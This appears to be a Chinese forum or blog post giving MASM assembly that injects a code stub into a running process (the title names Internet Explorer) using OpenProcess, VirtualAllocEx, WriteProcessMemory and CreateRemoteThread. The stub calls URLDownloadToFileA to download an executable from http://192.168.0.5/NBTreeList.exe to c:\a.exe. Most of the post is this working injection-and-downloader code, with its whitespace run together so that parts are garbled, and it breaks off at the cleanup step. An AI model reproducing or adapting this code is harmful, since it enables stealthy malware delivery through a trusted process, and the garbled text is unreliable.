注入下载文件的代码到IE进程然后执行下载的文件

大家可能都用过网页szBufferdd20dup(0),0 piddd0 hProcessdd0 hThreaddd0 pCodeRemotedd0 path1db'c:\a.EXE',0 .const szmsgdb'URLDownloadToFileA',0 userdlldb'Urlmon.dll',0 ;szmsgdb'MessageBoxA',0 ;userdlldb'User32.dll',0 szloadlibdb'LoadLibraryA',0;注意和LoadLibraryW的区别哟 kerdlldb'kernel32.dll',0 .code codebegin: dispdatadb"http://192.168.0.5/NBTreeList.exe",0 szTitdb"c:\a.exe",0 datalen=$-codebegin Rprocprocmsgbox;MessageBoxA的地址为参数 CALL@F;pushesi @@: POPEBX SUBEBX,OFFSET@B LEAECX,[EBX+dispdata] LEAEDX,[EBX+szTit] pushNULL push0 pushedx pushecx pushNULL callmsgbox ret;重要 Rprocendp codelen=$-codebegin;代码长度xx字节 start: ;invokeFindWindow,0,offsettit;返回计算器窗口句柄 invokeFindWindow,offsettit,0 invokeGetWindowThreadProcessId,eax,offsetpid;计算机器程序的进程PID号 ;invokewsprintf,offsetszBuffer,offsetszFormat,pid;把PID用十进制显示 invokeOpenProcess,PROCESS_ALL_ACCESS,FALSE,pid;打开进程,得到进程句柄 movhProcess,eax;保存进程句柄 invokeVirtualAllocEx,hProcess,0,codelen,MEM_COMMIT,PAGE_EXECUTE_READWRITE movpCodeRemote,eax invokeWriteProcessMemory,hProcess,pCodeRemote,offsetcodebegin,codelen,NULL movesi,pCodeRemote addesi,datalen pushesi invokeLoadLibrary,offsetuserdll invokeGetProcAddress,eax,offsetszmsg popesi invokeCreateRemoteThread,hProcess,0,0,esi,eax,0,0 movhThread,eax;返回线程句柄 .ifhThread invokeWaitForSingleObject,hThread,INFINITE;等待线程结束 invokeCloseHandle,hThread;关闭线程句柄 .endif invokeVirtualFreeEx,hProcess,pCodeRemote,codelen,MEM_RELEASE;释放